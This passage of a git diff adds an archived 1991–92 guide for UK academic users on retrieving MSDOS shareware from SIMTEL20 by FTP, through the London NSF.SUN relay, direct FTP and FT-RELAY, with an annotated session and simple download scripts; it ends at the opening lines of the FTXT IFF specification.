public-domain and shareware files from SIMTEL20, + * want a proven method of access to SIMTEL20 itself, including online + inspection of directories to see filenames and filesizes, + * are not at a site offering direct FTP, + * are new to FTP, and want a framework of understanding, not just a + recipe. + +You will need to find people at your own site who can adapt the methods +for the link with London, since this will vary from site to site. +Broadly you are likely to be reaching London from one of three kinds of +platform: + * a well-supported unix host at your site (as in Section 2.5) + * a well-supported VMS host at your site, + * a PC linked to a suitable high-speed local network using something + like the UK Rainbow package to give direct access to a JANET 'pad'. + +The London-SIMTEL20 link is standard for everybody, and is an example of +what the rest of the world understands as FTP. + + +2.2 Authorizations +------------------ +At most UK universities and polytechnics, both staff and students in +principle have unrestricted access to international email and to the UK's +substitute for FTP that links JANET sites. So all that is needed is +locally authorised access to + * a mainframe linked to JANET, or + * a PC linked to a net linked to JANET, +plus some specific information on distant sites and some knowhow. + +For the London interface with internet you need to know + address : uk.ac.nsfnet-relay.sun or nsf.sun + login : guestftp + password: guestftp + other : use a short form of your JANET email address as your + reference for the session + +For SIMTEL20 you need to know + address : wsmr-simtel20.army.mil + login : anonymous + password: anything - operator suggests 'guest' + other : if asked for passwords during the session press + +Since, many UK and international facilities are close to capacity and +prone to downtime, access in practice is resource-limited. + + +2.3 Outline and limitations +--------------------------- +A straightforward method is: + * connect your site to the London interface, + * connect the London interface to SIMTEL20, + * transfer a copy of the file you want from SIMTEL20 to London, + * close the link to SIMTEL20, +then either + * address a copy of the file to yourself at your own site, + * close the link to London, +or + * close the link to London, + * send to London for the file to be sent to you and deleted in London. +and finally + * wait. + +The first alternative uses a rather cumbersome special facility at +NSF.SUN, though its use is identical for all JANET users. The second +alternative depends on JANET file transfer utilities in use at your site, +but can be streamlined and is usually quicker. + +The London interface does not connect your site directly to Internet. You +are given a modest workspace in London to use as your base for FTP +connections on Internet. London has to be used as a temporary intermediate +store for files. It does not have much free space; it refuses entry when +there is less than 1Mb free to share between users. + +Like any FTP connection, the connection between London and SIMTEL20 is in +some ways a very limited affair. In particular: + * you cannot ask SIMTEL20 to display help/info files on your screen - you + have to bring them to London. +However, the interface in London offers fewer facilities than you +normally get when connected to another JANET site. In particular: + * having got the SIMTEL20 help/info files to London you cannot ask + London to display them on your screen - you have bring them to your + own site. + +Although you may have read about automated FTP, there are no ready-made +scripts suitable for you-London or London-SIMTEL20. + + +2.4 Getting information files before you start +------------------------------------------------ +You may find the example in section 2.5 sufficient, but it is preferable +to send two email messages in the following format, with your own email +identity substituted for mine, and to read and perhaps to print the +replies: + + 1 + From: bsrdp@uk.ac.warwick.cu + To: info-server@uk.ac.nsfnet-relay + + Request: guestftp + Topic: userguide + Request: end + + 2 + From: bsrdp@uk.ac.warwick.cu + Reply-To: bsrdp%cu.warwick.ac.uk@UKACRL + To: trickle@awiwuw11.earn + Subject: Anything you like, or leave out the whole line + + /pdget SIMTEL20.INF + /pdget QUICKREF.LST + +The final @UKACRL refers to the JANET/EARN interface; from the point of +view of EARN it is a part of every UK address. This second message should +yield + * Keith Petersen's standard file of information on SIMTEL20, including + information about what to do when you get an ftp connection; + * a list of the main MSDOS directories at SIMTEL20. + + +2.5 An annotated example of ftp from SIMTEL20 +--------------------------------------------- +I could connect my PC direct to the London interface, but I prefer to use +one of Warwick's Unix mainframes as my base for communications. It has +PD versions of ARC and UNZIP, and also ZOO, DEBOO, UUDECODE and XXDECODE +which I need for the other routes. It is also where I keep an up-to-date +copy of SIMIBM.ARC and scripts for partly automating some of the +processes. + +So I will start at my PC and collect from SIMTEL20 + pd1:FV137.ZIP , +via my Warwick Unix host. I know of the existence and pathname of the +file from a news announcement. [ A later version is now current, but I +have left this annotated example unchanged ] + +To establish a style of presentation I will start with the familiar. I +will sometimes use [ ] to enclose brief summaries of what appears on the +screen, so I can concentrate on the key moves. I will also number the +various sections for reference later in the file. Here goes: + +2.5.1 --- WARWICK PC --- + +a:> +a:>kermit + MSDOS on my PC awaits input - no hard disk today, it failed physically + during the week. + I start an old small version of my PC communications package. + +Kermit-MS> +Kermit-MS>c + MSKERMIT on my PC awaits input. + I ask to be connected to the network my PC is physically plugged into. + +[blank screen] +[blank screen] + The ageing Local Area Switching System awaits input! + I tentatively press the key. + +Please select computer +Please select computer anemone + I enter the local name for the Unix host I use. + + +2.5.2 --- WARWICK UNIX HOST --- + +login: +login: bsrdp + My Warwick Unix host awaits a username. + I enter my own username. + +Password: +Password: + I enter my own password - it isn't echoed! + +[variety of login info] +TERM = (vt100k) +TERM = (vt100k) + My Warwick Unix host reports my usual terminal configuration and + awaits for confirmation or the name of an alternative. + I press to confirm my terminal type, although I'm not sure my + PC end really is vt100 today! However, nothing goes wrong later in + the session, and no other machine asks about terminal type. + +41: +41: pad nsf.sun + My Warwick Unix host awaits input. + I ask to be connected to the London interface with Internet. + + +2.5.3 --- LONDON NSF.SUN --- + +Connected, break in character is ^p +To enter command state type ^p followed by 'a' +University of London Computer Centre (uk.ac.nsfnet-relay.sun) X.29 Service +login: +login: guestftp + NSF.SUN awaits a username. + I enter the standard username for public access to NSF.SUN + + The two lines referring to ^p have nothing to do with London but were + printed by, and refer to, a process that was started by "pad" on the + fast communications network at Warwick between my Warwick Unix host + and NSF.SUN. + +Password: +Password: guestftp + NSF.SUN awaits a password. + I enter the standard password for public access to NSF.SUN + +Warning - only 1723 Kbyte available for the whole service +Do you still want to use use the service at the present time ? ( y or n ) +Do you still want to use use the service at the present time ? ( y or n )y + The limited space message appears if there is less than 4Mb of disk + space left. If there is less than 1Mb then I am allowed on only to + list the names of my files and/or delete some. + I decide to go ahead. + +Enter your reference for this session: +Enter your reference for this session: bsrdp@warwick + NSF.SUN awaits the name of a directory to be created to hold my files. + I enter a name in the recommended form for NSF.SUN - a short form of + my JANET address. + +guest-ftp> +guest-ftp> help + NSF.SUN awaits input. + I decide to ask for information, correctly guessing what the command + might be. + +[List of commands and files] + It takes a while before I realise that I have entered the GUEST-FTP + HELP environment, that I shall stay in it until I type in a command to + leave it, and that typing a listed command name now does not activate + the command but simply causes information about it to appear on the + screen. + + I spend a few minutes reading about commands and making a note of + those I might want. I also read the short text files on offer. A + reminder of how to leave the GUEST-FTP HELP environment is continually + renewed on screen. + +guest-ftp> +guest-ftp> ftp + I ask for an ftp session to be started. + + +2.5.4 --- LONDON NSF.SUN FTP --- + +ftp> +ftp> help + NSF.SUN FTP awaits input. + In this FTP session, what I get on my screen is similar to what users + in the rest of the world see when they use FTP, and similar to what + is directly available at selected JANET sites. + I decide to ask for information, again correctly guessing the command. + +[Longer list of commands] + It takes a while before I realise that this time I have not entered a + help environment, and that typing a command name activates the + command. To learn about "ascii" I must now type + "help ascii". + I spend a few minutes reading about commands and making a note of + those I might want under the impression that I shall leave London + behind when I connect to SIMTEL20. + + Later I discover that I do not leave London during distant connections + - ftp is an armslength affair, and this help facility remains + available throughout the connection to SIMTEL20. + +ftp> +ftp> open wsmr-simtel20.army.mil + I ask to be connected to SIMTEL20. + +ftp: connect: Network is unreachable +ftp> + NSF.SUN FTP could not make the connection and now again awaits input. + Busy? Broken? Back soon? May be days? No information is obtainable. + Later I discover that it is easier to get connected to SIMTEL20 + in the morning before the USA wakes up! + Later still I discover that the wsmr-simtel20 address is sometimes + declared to be unknown - this happens when parts of Internet become + inaccessible, and the server that confirms the army.mil addresses is + not reachable. + Seven hours and several attempts later ... + +Connected to 192.88.110.20 +220 WSMR-SIMTEL20.ARMY.MIL [....] +Name (192.88.110.20: guestftp) +Name (192.88.110.20: guestftp) anonymous + SIMTEL20 announces itself and awaits a valid username. + I enter the standard username for public access to SIMTEL20. + Later I learn that this is the usual username for FTP access around + the world. + +ANONYMOUS user ok, send real identity as password +Password: +Password: guest + SIMTEL20 accepts the username and awaits a password. + I ignore the on-screen request and enter one of the suggestions from + Keith Petersen's advice file - it isn't actually echoed. + Later I discover that some FTP sites are quite fussy about the + password and expect a valid email address containing @ . + +ftp> +ftp>dir + NSF.SUN FTP and SIMTEL20 await input. + I ask NSF.SUN to ask SIMTEL20 to display a list of files in the + current directory on SIMTEL20. + +200 Port ... accepted +150 List started +PS: + [List of files in current directory on SIMTEL20] +226 Transfer completed + Processes at SIMTEL20 clunk away giving a series of numbered progress + reports and produce the information I want. Numbered reports are a + general feature of FTP; each represents a phase that can fail and + therefore cause the remaining phases to be aborted. + +ftp> +ftp> cd pd1: + I ask NSF.SUN FTP to ask SIMTEL20 to change directories so that I can + look for the file I want in case it has been replaced by a newer + version. I follow the notes I made from Keith Petersen's information + file. + +331 Default name accepted. Send password to connect to it. +331 Default name accepted. Send password to connect to it. + Wow! Can't even change directory at SIMTEL20 without permission. + I remember Keith's advice and press the key. + +[acceptance message] +ftp> +ftp> dir + SIMTEL20 changes the directory. + I ask NSF.SUN FTP to ask SIMTEL20 to display a list of files. + +[Two or three screens of file information roll by, including the target] + So far, I only seem to be able to control output by using the + Ctrl-S/Ctrl-Q keys to stop/start screen output on my PC. + Later I discover that at some FTP sites I can reduce the list of + names by specifying a unix-like target for the file by something + like: + dir fv* or dir fv*.* + +ftp> +ftp> hash + Transfer will take place silently and I won't have any indication of + how it is going, so I ask for a # to be put on screen every so many + bytes. There are so many linkage points between London and SIMTEL20 + that transfer can be interrupted for 20-30 seconds at times (longer + usually means the connection has been lost). + Later I discover that directory listings are peppered with # signs + if I forget to type hash again after a binary transfer. + +Hash mark printing on (1024 bytes/hash mark) +ftp> +ftp> type binary + I ask NSF.SUN FTP to arrange that, until further notice during this + session, files are to be despatched from SIMTEL20 in 8-bit binary + format, to be treated like that on the way, and to be held in London + in that format for re-transmission to Warwick. + Despite Keith's strong advice to ask for TENEX mode, I find that + ZIP/ARC files arrive in perfect condition. + +200 Type I ok +ftp> +ftp> get fv137.zip + SIMTEL20 agrees. + I ask NSF.SUN FTP to ask SIMTEL20 to send a copy of the file I want. + +200 Port 4.224 at host accepted +150 Retrieve of PD1:FV137.ZIP.1 (4 pages, 8128 8-bit bytes) +226 Transfer completed. 8128 bytes transferred +8128 bytes received in 17 seconds + SIMTEL20 thinks it worked. + NSF.SUN FTP is non-committal, but at least its byte count agrees. + +ftp> +ftp> quit + NSF.SUN FTP awaits input. + I ask it to close the link with SIMTEL20 and to end the FTP session. + For sites where direct FTP is available, this point marks the end of + an FTP session. + + +2.5.5 --- LONDON NSF.SUN --- + +[Closing message from SIMTEL20] +guest-ftp> +guest-ftp>dir + NSF.SUN awaits input. + I ask for the files in my London directory to be listed. + +[one filename - fv137.zip] +guest_ftp> +guest_ftp> push + It's there! + NSF.SUN awaits input. + I call a very basic transmission utility to send the file to my Unix + host at Warwick. It is a tedious method. For regular use I prefer + the sort of streamlined method described in Section 2.5.7. But the + steps here are: + * independent of facilities at your own site, + * usable by a beginner from any host with a registered JANET + address. + +Okay lets push a file using NIFTP +Give local filename: +Give local filename: fv137.zip + NSF.SUN starts up a utility for sending files. + I quote the file name in my directory on NSF.SUN. + Later I discover that if I make a mistake it is simplest to answer + nonsense to the remaining questions - NSF.SUN then rejects the + request and I can start again. + +Give remote filename: +Give remote filename: nsf.fv137.zip + I quote the name I want the file to have on my Unix host to remind me + of its origin until I'm sure it is OK. + +Give NRS name of remote host: +Give NRS name of remote host: uk.ac.warwick.anemone + I quote an address down to the actual machine that holds my home + filespace at Warwick. + +Do you want binary or ascii (input b or a): +Do you want binary or ascii (input b or a): b + I'm sending a zip file - it must be binary. + +OK binary it is - input word size : +OK binary it is - input word size : + Well, it says default, so I'll just press + +Give user name on remote host: +Give user name on remote host: bsrdp + I quote my usual username for my Unix host. + +Give user password on remote host: +Give user password on remote host: + I quote my usual password for my Unix host - it isn't echoed + +Re-type password to make sure: +Re-type password to make sure: + I re-quote my password - again it isn't echoed + +Push status..please wait.. +Push status..please wait.. OK - Request sent to the Spooler - use "q" to check +guest_ftp> +guest_ftp> q + A message from the push utility unfolds as it puts my request into + NSF.SUN's queue of jobs to be done. + Later I discover that various checks are done, and that other + messages may unfold. In particular, NSF.SUN checks whether the name + of the "remote host" (my Unix host) is on its list of acceptable + addresses. + I accept the invitation to see my request in the list of waiting jobs. + +Sorry - this command has been disabled for the time being !!! +guest-ftp> +guest-ftp>exit + NSF.SUN declines to do what it has just offered - presumably lists + get horribly long. Since there is no means of checking, I shall just + have to return to Warwick and wait to see what happens. + I close the connection to London. + + +2.5.6 --- WARWICK UNIX HOST --- + +42: +42: ls + My Warwick Unix host awaits input. + I ask for a list of files in my home directory. + +[ No sign of nsf.fv137.zip ] + I get on with something else. + + About an hour later I notice a copy of the file has arrived and that + the file size looks about right. About six hours after that a mail + message arrives saying that the file has been transferred. I find + the message next day. + + Later I discover that the copy of the file on NSF.SUN is deleted as + soon as NSF.SUN thinks that it has succeeded in sending a copy. + +94: +94: unzip -t nsf.fv137.zip + I ask for the integrity of the zip file to be tested using a PD unix + version of unzip that was circulated on the net some time ago. + + To get your own copy of unzip, collect the source code as a binary + file from SIMTEL20 + pd6:UNZIP.TAR-Z + then rename it + unzip.tar.Z + uncompress, detar, and compile it. + +[each file in the zip reported to be OK] +95: +95: mv nsf.fv137.zip fv137.zip + Now I know it is genuine, I no longer want to show where it came from. + That's it for now - I'm not sure I've got the right configuration + today for the next stage. But with my usual copy of kermit on the PC + the final stages would start ... + +96: +96: kermit s8 fv137.zip + Request binary transfer to PC. With the software nowadays normally + present at the two ends, I no longer have to bother swapping between + 7-bit and 8-bit settings at the PC end. + On completion of the transfer I would + - test the integrity of fv137.zip on the PC (though this never goes + wrong unless I fail to tidy up after interrupting an earlier + transfer), + - return to my Warwick Unix host to delete the copy there, + - close the link to my Warwick Unix host. + +End of example + + +2.5.7 --- STREAMLINING NSF.SUN TO OWN SITE --- + +The NSF.SUN administrator recommends you not to push files from NSF.SUN, +but to to pull them from your own site. + +It is good advice. At your own site you can store all the unchanging +transfer data and avoid repeating it manually for each file pulled from +NSF.SUN . However, recipes for pulling files from NSF.SUN depend on +whichever of the medley of JANET file transfer methods is/are installed +at your site. I can only show you what is possible and leave you to +adapt it for your context. + +Here is a revised transcript of the relevant part of the session +described in Sections 2.5.5 and 2.5.6, and then a brief guide to how on +my Unix host I provided the new command used in the transcript. + +Revised transcript: + +[Closing message from SIMTEL20] +guest-ftp> +guest-ftp>dir + NSF.SUN awaits input. + I ask for the files in my London directory to be listed. + +[one filename - fv137.zip] +guest_ftp> +guest_ftp> exit + It's there! I ask to end the connection to London. + +42: +42: nsfget fv137.zip + The Warwick unix host awaits input. + I ask for the file to be collected from NSF.SUN using a new command I + have created for this purpose. I have written the command so that if + I have more than one file, I simply add extra names in one long line. + +fv137.zip:transfer id is 004756 +43: +43: hhq + My command calls hhcp, a file transfer utility often available on + unix systems; hhcp sends my request to join the general queue of + transfer requests to and from Warwick and reports the reference + number of my request. No further information will be sent to me about + the progress of this request unless it still hasn't been successfully + completed in several days time, but there are means of checking its + progress. I ask to see the state of the general queue. + +[list of requests in the queue without mine among them] +43: +43: ls -l + Looks as though everything might have happened so fast that the + transfer is complete. + I ask to see a list of files in my current directory. + +[list which includes fv137.zip with a date and time more or less now ] + +End of revised transcript + + +The sequence of steps to make the new command nsfget available on my +Unix host was: + + * make a permanent record of the transfer parameters by entering + hhstore nsf.sun + and then completing the offered entry lines as shown, or skipping + them by pressing , to read + transfer authorization: guestftp + transfer password: guestftp + account name: + account password: + file password: + output device type: + output device type qualifier: + mode of access: read and remove + binary word size: 8 + special options: + + * create a unix script file 'nsfget' specific to me since it + includes the name of my temporary directory at NSF.SUN + #!/bin/sh + #`nsfget' to get my files from nsf.sun + [ $# -ne 0 ] || { + echo 'Ownuse: nsfget [ file ... ]' + exit 1; } + for i + do + hhcp -L -b -a nsf.sun:bsrdp@warwick/$i $i + done + exit 0 + #End of nsfget + + * make the script executable by + chmod u+x nsfget + + +-------------------------------------------------------------------------- +3. Getting a file from SIMTEL20: FTP direct +-------------------------------------------------------------------------- + +3.1 Scope of advice +------------------- +For UK people at those selected sites which have direct access to FTP and +who + * want MSDOS public-domain and shareware files from SIMTEL20, + * are new to FTP. + +Much of the relevant advice is a subset of Section 2, and the longer +sections of that are simply pointed to and not repeated here. + + +3.2 Authorizations +------------------ +At UK universities and polytechnics in which direct FTP is being +installed, both staff and students are in principle expected to have +unrestricted access to FTP via mainframe hosts. Direct access from PCs +may not be generally supported. + +To get access to SIMTEL20, you need to know + address : wsmr-simtel20.army.mil ( or 192.88.110.20 ) + login : anonymous + password: anything - the operator suggests 'guest' + other : if asked for passwords during the session press + +Accessing other sites is similar: the login response is identical, but + * some sites insist that the password be a valid email address, + * some sites insist that your site's Internet identity be in its + own listing of Internet identities - this can be a dampener to + your enthusiasm at a newly connected site. + + +3.3 Outline and limitations +--------------------------- +The method is simple: + * connect to a suitable host as in section 2.5.1 above, + * call ftp - on my unix host I simply enter + ftp + to start an FTP session as in section 2.5.4 above. + +Compared with the FTP session described in section 2.5.4 you have one +important advantage on a unix host - during an FTP session you can start +a subsidiary shell within which you have a minute or so to do things at +your own site before the remote site closes the connection because of +inactivity. In particular, this just gives adequate time to + * run a verification of a .ZIP or .ARC binary just downloaded, + * skim through a help/info file, + * look through an annotated index of files from a particular + directory. +However, although this can be helpful for the first exploration of a +distant site, it should not be regarded as a regular working method - a +minute is a relatively enormous waste of network time. + + +3.4 Getting information files before you start +------------------------------------------------ +Send email message#2 from section 2.4, or if you think the example in +section 2.5.4 is enough, connect to SIMTEL20 and collect the two files + pd1:SIMTEL20.INF + pd1:QUICKREF.LST + + +3.5 Automation of FTP file collection +------------------------------------- +The London interface in section 2.5.4 is limited in various important +respects: it provides only a subset of normal FTP. + +At your own site, you can control how an FTP session is started, and in +particular you can use ftp scripts to automate your connections to the +distant site (section 3.5.1). This is + * efficient and convenient for you, since you can repeat an + attempted connection simply by calling the script again, + * efficient for the distant site and the networks connecting you, + since connect time excludes all the time you normally take to + think and type during a connection. +Typically an FTP exploration session then consists of many brief scripted +connections with the results of one version of the script reviewed and +edited into the next version. So for example, 60 minutes of clock time +may need no more than 3 minutes of network time. + +More controversially, and with the risk that you might make a +considerable nuisance of yourself, you may be able to automate the +re-trying of connections if you often don't get through to the distant +site first time (section 3.5.2). There is no satisfactory method of +automating recovery from lost connections after file transfer has begun. + +The rest of this section supposes you are working from a unix host. In +places the recipes that do or do not work for me may additionally depend +on the fact that I am working in a csh environment under SunOS 4.1.1. +I have chosen a style of working that unifies the approach in the two +sections. + +If a distant site is almost always accessible first call then section +3.5.1 is preferable; if connection regularly requires several retries, +section 3.5.2 is more convenient. + + +3.5.1 Scripts for ftp connections + +A script simply consists of a complete set of ftp commands to open, +operate, and close an ftp connection, similar to those that you use for +a manual connection but with some important differences: + * the first few lines have their own special format, + * the script must be complete - make sure you end with bye or close, + * the script must be plain text - don't use a wordprocessor file with + hidden formatting characters, + * the script must be correct - build up your knowledge of a distant + site by a series of modest information requests, and develop a habit + of corect spellling. + +To get a directory listing from SIMTEL20, first prepare a text file, say +'simlist,' containing commands in this style: + verbose + open wsmr-simtel20.army.mil + user anonymous guest + dir pd1: arc-lib.dir + bye +Then enter the command line + ftp -in < simlist +and watch on-screen reports of the progress of the connection. If all +goes well, you will in a few seconds have a new file 'arc-lib.dir' +containing the directory listing from SIMTEL20. + +If you fail to connect successfully with the distant site, a retry simply +consists of typing the command line again. If you are working in an +environment with command history, like csh, this can be reduced to +something like + !ftp +or even less - all you need after the ! is an opening scrap long enough +to reach back uniquely through the history log. + +To get a binary file from SIMTEL20 you have to change to the directory +containing the file you want and have to make sure that 8-bit rather than +7-bit transmission is used. So edit 'simlist' to contain commands in +this style: + verbose + open wsmr-simtel20.army.mil + user anonymous guest + binary + hash + cd pd1: + get fv138.zip + bye +On my unix host the specification of 'binary' is sufficient to get +uncorrupted binaries from SIMTEL20. You may have to use 'tenex' as +recommended in the advice file in section 3.4. Note that the current +version of fvnnn.zip on SIMTEL20 may now be later than 138. + +You can include several small requests in one script, but until networks +are more reliable big files are probably better handled with a separate +script for each. + +In section 3.5.2, verbose is an essential command. Without it, your +retry process will collect the same information over and over again. But +for manually started scripts you can leave it out, and then you will only +have a brief, though perhaps insufficiently informative, message if the +connection fails. + +As your confidence/skill increases, you will be able to use the scripts +in different ways. Here are two ideas. + +Idea 1 +If you are unlikely to want a file copy of a directory, omit the filename +for your end, for example + dir pd1: +and call the script with the command line + ftp -in < simlist | less +which releases network connections quickly, but allows you to browse up +and down the listing at leisure. + +Idea 2 +Make the ftp session a background process while you do something else. +You might think of just entering the command + ftp -in < simlist & +but that sends progress reports to the screen, and if anything goes wrong +the background process will be indefinitely suspended unable to send its +error report to the screen. Use a command of the form + ftp -in < simlist >>& ftp.log & +so all messages are added to a general log that you can inspect and scrap +from time to time. You would no longer need hash in your scripts, but +keep verbose in. + + +3.5.2 Automating tries and re-tries + +For an automatic method of re-trying failed requests, it is difficult to +devise rules to strike an efficient and responsible balance between +persisting and stopping (an unresolved problem for the developers of +FT-RELAY). + +A reasonable user-developed attempt at managing retries on unix hosts can +be found on SIMTEL20 as + pd6:BATCHFTP.TAR-Z +Its management of the retries themselves seems to be sound, but it is + * sensitive to the flavour of unix under which it is used, + * critically dependent on the script being correct if it is to + terminate and tidy-up properly, + * unable to recover if a connection is lost once file transfer has + started. +Each of which means that unless you know how to inspect and manage unix +processes on your system it is probably better left alone. + +To use it, collect it as a binary file and rename it + batchftp.tar.Z +uncompress, detar, and compile it. To avoid problems until you are +experienced with it: + * keep the scripts in a special directory, + * change to the directory before calling the programme, + * give the incoming files plain filenames without a path. +You can experiment with relaxing these conditions if and when you have +seen it deal successfully with a wide range of connection problems. + +An appropriate script, say 'simb', for getting a directory with batchftp +would read: + { + verbose + open wsmr-simtel20.army.mil + user anonymous guest + dir pd1: dir.filedocs + bye + } +which is simply an ftp script from section 3.5.1 with new first and last +lines, and in which + * the verbose command is essential since it provides the data + with which batchftp controls retries, + * the bye/close command is essential in my system to ensure + termination and file tidying after a successful connection. +The script would be run as a background process by the command line + batchftp -i simb & + +If you know you know that now is a bad time of day/week to launch +batchftp, then rather than adding to network traffic by repeating tries +that are almost bound to fail, put the command line itself into a +one-line command file, say 'dosimb', reading + batchftp -i simb +and then enter commands like + chmod u+x dosimb + at 2330 Sat dosimb +to arrange for it to be launched for its first try when networks are +quiet. + +The temporary and permanent message files of batchftp are slightly +infelicitous, lacking a final carriage return and linefeed. However, +their format is critical to the operation of the programme. + +-------------------------------------------------------------------------- +4. Getting a file from SIMTEL20: one-step file request via FT-RELAY +-------------------------------------------------------------------------- + +Although the examples in section 4.5 are for calling files from SIMTEL20 +itself, those who use FT-RELAY usually aim at a mirror site like +wuarchive.wustl.edu because: + * there is usually a much better chance of first-time connection, + * the peculiarities of pathnames at SIMTEL20 make it harder to + include them in general shell scripts designed to save the + tedious repetition of standard details to several remote sites. + +4.1 Scope of advice +------------------- +For UK people who have access to JANET and who + - want MSDOS public-domain and shareware files from SIMTEL20, + - want the convenience of delivery to their own site in one-step, + - do not have access to direct FTP and do not want to operate manually + at the London interface. + +You will need to find people at your own site who can adapt the methods +for the link with FT-RELAY, since this will vary from site to site. +Broadly you are likely to be reaching FT-RELAY from one of three kinds of +platform: + - a well-supported unix host at your site (as in Section 4.5) + - a well-supported VMS host at your site, + - a direct access point to a network at your site. +Since action consists entirely in formulating and sending an appropriate +message to FT-RELAY, the on-screen appearance of these three environments +is likely to strike the beginner as having nothing in common! If you do +not use a unix host you may find it easier to ignore section 4.5 and to +start from scratch with the information in section 4.4. + + +4.2 Authorizations +------------------ +As in section 2.2. + + +4.3 Outline and limitations +--------------------------- +The method is to send a message to your site's outgoing message queue and +wait! + +On a unix host, an appropriate medium is an hhcp command which takes its +turn in the list of outgoing messages, and stays there until: + * deleted by FT-RELAY, or + * deleted by you. + +In August 1991 it was true to say +FT-RELAY deletes your message if: + * it meets your request, or + * the distant site says that the content of your request cannot be + complied with, or + * it fails to connect with the distant site + [ which means that FT-RELAY does not have to keep long lists of + unfilled requests, but also means that you have to make a lot + of resubmissions if networks and/or sites are congested ], +and FT-RELAY preserves your message if + * the distant site says it is too busy. + +But the behaviour is still subject to experiment. For example, in Sep +1991 file requests to SIMTEL20 were kept alive for several hours until +successful, though directory requests were dropped after one failure. To +do this, FT-RELAY did *not* maintain a backlog of requests: it simply +used a reply code that caused software at my site to keep the request in +the queue of outgoing messages. + +That seems a reasonable behaviour. + +It would not, I think, be wise to press for FT-RELAY to hold its own +backlog of requests. Although that might be convenient for people using +background methods on an intermediate host, it would make a direct +PC-JANET link impractical. + + +4.4 Getting information files before you start +------------------------------------------------ +For information on SIMTEL20, send email message#2 from section 2.4, or if +you think the example in section 4.5 is enough, send to FT-RELAY for the +the two files + pd1:SIMTEL20.INF + pd1:QUICKREF.LST + +The general principles of how to use FT-RELAY are available on-line in +JANET NEWS. Starting from my unix host, to read the advisory files I +enter + pad janet.news +and follow the on-screen instructions to + directory GATEWAYS, sub-directory FTRELAY, for the file files + INTRO, CBS, and FTAM ; and to + directory NETWNEWS, file NEWS33, for the original announcement + which was garbled in the relevant section (each opening + quote became a U and each closing quote became a T). + + +4.5 An example of a request to FT-RELAY +--------------------------------------- +The advice as it appears on JANET is almost ready-made for direct PC to +FT-RELAY connection using the PC Rainbow utility. But implementing the +advice on a unix host is trickier, particularly if you want to reach +SIMTEL20 itself - directory names on SIMTEL20 use characters which on a +unix system do powerful things. + +On my unix host I eventually implemented what is described as method B in +NEWS33 . It works for both SIMTEL20 and unix mirrors. So here is the +recipe. + +First establish a name, say ftb, for all future requests to FT-RELAY +using this particular method, so that you can later experiment with other +methods: + hhalias UK.AC.FT-RELAY ftb + +Next, record the parameters that you want to be used every time you use +this method, filling in or skipping the lines that appear automatically +after the first command: + hhstore ftb + transfer authorization: anonymous + transfer password: bsrdp@warwick.ac.uk + mode of access: + binary word size: 8 +Although hhstore is not something to trust with confidential personal +authorizations to a remote site, these standard formats are effectively +public. + +Now you are ready to make your first two specific requests, one for a +directory and one for a binary file. In practice each request is entered +on a single line although I show them here using two lines each: + + hhcp -L ftb:"wsmr-simtel20.army.mil::(D)pd1:" + arc-lbr.dir + + hhcp -L -b ftb:"wsmr-simtel20.army.mil::pd1:fv138.zip" + fv138.zip + +You have asked for + * the directory to be sent to you as a file, and to be + given the name arc-lbr.dir on your system, + * the file fv138.zip to be sent and given the same name. + +Notice the placing of the double quotes which contain the complete +specifications for SIMTEL20 - for the topmost directory at a site the +specification stops after (D). Notice too that the problem of directory +management during file transfer is left to FT-RELAY. + +The unix host replies quoting the reference number for each one-line +message and you are then free to continue. You can inspect the state of +the message queue with + hhq +to see whether they have yet been dealt with ( tries are typically made +at 5 minute intervals for half an hour, and after that the intervals +typically double every six tries ). You can also inspect a detailed log +of connection attempts from you to FT-RELAY with + hhlog +both while waiting, and after finding a message has been dropped without +the requested file having arrived. + +To avoid re-typing long standard parts of the command line you can create +simple executable shell scripts: for example, here are separate scripts +for calling directory listings and calling binary files from SIMTEL20: + + #!/bin/sh + # hhd - script to call a sub-directory listing + case $1 in + "") echo My use: hhd directoryname ;; + * ) hhcp -L ftb:"wsmr-simtel20.army.mil::(D)pd1:" $1.dir ;; + esac + exit 0 + #end of hhd + + #!/bin/sh + # hhb - script to call a binary file + case $2 in + "") echo My use: hhb directoryname filename ;; + * ) hhcp -L -b ftb:"wsmr-simtel20.army.mil::pd1:$2" $2 ;; + esac + exit 0 + #end of hhb + +With these available, and the transfer authorizations permanently stored +by hhstore as earlier in section 4.5, the two examples simply become + hhd arc-lbr + hhb arc-lbr fv138.zip + +It is possible to construct more elaborate scripts - see the companion +file FTP2UK23.ZIP + +-------------------------------------------------------------------------- +5. File history - main revisions +-------------------------------------------------------------------------- +Version 2.3 Apr 1992 + Updated information on Lancaster and Imperial College. + Added oak.oakland to list of non-UK sites of interest. + +Version 2.2 Oct 1991 + Added section 0.1 on file transfer on Internet and JANET. + Revised sections 2.5 to 2.7 on getting files home from NSF.SUN. + +Version 2.1 Sep 1991 + Added mirror at src.doc.ic.ac.uk + Thanks to Lee McLoughlin for information on the IC mirror, and to Nino + Margetic for significant suggestions on FT-RELAY scripts. + +Version 2.0 Aug 1991 + Restructured to include + mirrors at wuarchive.wustl.edu and nic.funet.fi + one-step file request via FT-RELAY, + direct FTP from selected sites. + Thanks to Tim Clarke and Rob McMahon for advice on FTP and FTP-RELAY + at Warwick, and to Dirk Reuver and Andrew McClean for significant + suggestions on routes and methods. + +Version 1.0 Jul 1991 + First public version covering + alternatives - Lancaster, Trickle's, mirror at garbo.uwasa.fi + two-step FTP via London. + +Version 0.1 May 1991 + First draft of a response to an enquiry by Keith Petersen about FTP + connection between the UK and SIMTEL20. + Limited circulation of complete draft to various experts: + Tony Bates , i/c NSF.SUN + Keith Petersen , i/c SIMTEL + Tim Clarke , i/c Comms at Warwick + and of part of draft + Turgut Kalfaoglu , i/c TRICKLEs in Europe + Alan Phillips , i/c UK National Software Archive, Lancaster + Timo Salmi , i/c VAASA . + +Thanks to all for advice and comment - errors remain my responsibility! + +----------------------------------------------------------------------------- +Hylton Boothroyd h.boothroyd@warwick.ac.uk or, if necessary: +Warwick Business School Janet: h.boothroyd@uk.ac.warwick +University of Warwick Internet: h.boothroyd%warwick.ac.uk@nsfnet-relay.ac.uk +COVENTRY, CV4 7AL Uucp: h.boothroyd@warwick.uucp +Phone (+44) 203 523523 Earn/Bitnet: h.boothroyd%uk.ac.warwick@UKACRL +------------------------------------------------------------------------------ diff --git a/textfiles.com/computers/ftxt b/textfiles.com/computers/ftxt new file mode 100644 index 00000000..e0bae13f --- /dev/null +++ b/textfiles.com/computers/ftxt @@ -0,0 +1,474 @@ +"FTXT" IFF Formatted Text + +Date: November 15, 1985 +From: Steve Shaw and Jerry Morrison, Electronic Arts and + Bob "Kodiak" Burns, Commodore-Amiga +Status: Draft 2.6 + +DRAFT 